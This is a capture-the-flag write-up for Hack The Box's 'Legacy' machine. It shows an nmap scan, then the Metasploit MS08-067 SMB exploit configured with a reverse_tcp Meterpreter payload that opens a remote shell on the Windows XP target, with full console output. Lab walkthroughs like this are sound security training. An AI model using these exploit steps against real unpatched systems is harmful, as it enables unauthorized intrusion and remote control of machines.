___ ___ _________ ________ |\ \|\ \|\___ ___\\ __ \ ___ \ \ \\\ \|___ \ \_\ \ \|\ /_|\__\ \ \ __ \ \ \ \ \ \ __ \|__| \ \ \ \ \ \ \ \ \ \ \|\ \ ___ \ \__\ \__\ \ \__\ \ \_______\|\__\ \|__|\|__| \|__| \|_______|\|__| ___ _______ ________ ________ ________ ___ ___ |\ \ |\ ___ \ |\ ____\|\ __ \|\ ____\ |\ \ / /| \ \ \ \ \ __/|\ \ \___|\ \ \|\ \ \ \___| \ \ \/ / / \ \ \ \ \ \_|/_\ \ \ __\ \ __ \ \ \ \ \ / / \ \ \____\ \ \_|\ \ \ \|\ \ \ \ \ \ \ \____ \/ / / \ \_______\ \_______\ \_______\ \__\ \__\ \_______\__/ / / \|_______|\|_______|\|_______|\|__|\|__|\|_______|\___/ / \|___|/
Hack The Box's Legacy is an Easy machine that features the CVE-2008-4250 vulnerability which was first disclosed in 2008 and effected Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems. This vulnerability allows us to run remote attacks if the target receives a specially crafted RPC request. You can learn more about this vulnerability's CVE details here.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.129.141.229
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.
Start by doing a quick service scan using Nmap. We will use the -sC and -sV switch to enable version detection and OS scanning on the network's ports. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive the following output in your terminal:
nmap -sC -sV -Pn 10.129.141.229 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 21:53 GMT Nmap scan report for 10.129.141.229 Host is up (0.0043s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_smb2-time: Protocol negotiation failed (SMB2) |_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:40 (VMware) | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2022-03-29T02:51:07+03:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.51 seconds
On open port 445 we can see that Windows XP is running. You can also see more details in the Host script results section. I suggest using your favorite search engine to always do some research on services running on open ports and their vulnerabilities. After doing some searching, we find we can exploit this using the MS08-067 Microsoft Server Service Relative Path Stack Corruption Metasploit module.
Open Metasploit in a new terminal by typing "msfconsole".
msfconsole .,,. . .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . =[ metasploit v6.1.9-dev ] + -- --=[ 2169 exploits - 1149 auxiliary - 398 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ] Metasploit tip: View all productivity tips with the tips command msf6 >
Lets search for the MS08-067 exploit using the "search" option.
msf6 > search ms08-067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
Metasploit returns a single option, which we are looking for, exploit/windows/smb/ms08_067_netapi. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.
Once the exploit has loaded, type "options" and hit Enter. This will bring up the exploits options which we will need to configure.
msf6 > use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms08_067_netapi) > options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://gi thub.com/rapid7/metasploit-framewo rk/wiki/Using-Metasploit RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRV SVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh , thread, process, none) LHOST 157.245.81.12 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf6 exploit(windows/smb/ms08_067_netapi) >
Our RHOSTS option is blank and is required to run the exploit. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.141.229 RHOSTS => 10.129.141.229 msf6 exploit(windows/smb/ms08_067_netapi) >
Our RPORT is already properly set to port 445. You may need to change your Payload options LHOST and LPORT if you are using a VPN, Virtual Machine, or HTB PWNBOX. Most of the time, this can be done just by entering "set LHOST" followed by your interface, usually "tun0". With everything all set, it's time to run the exploit by typing "run" then hitting Enter.
msf6 exploit(windows/smb/ms08_067_netapi) > run [*] Started reverse TCP handler on 10.10.14.51:4444 [*] 10.129.141.229:445 - Automatically detecting the target... [*] 10.129.141.229:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.129.141.229:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.129.141.229:445 - Attempting to trigger the vulnerability... [*] Sending stage (175174 bytes) to 10.129.141.229 [*] Meterpreter session 1 opened (10.10.14.51:4444 -> 10.129.141.229:1071) at 2022-03-23 22:08:22 +0000 meterpreter >
We got a Meterpreter session! We can now type "shell" and hit Enter to get a shell on the target system!
meterpreter > shell Process 884 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
You can now navigate through the target system to obtain the root and user .txt flags which are located within the user and administrator's Desktop folders.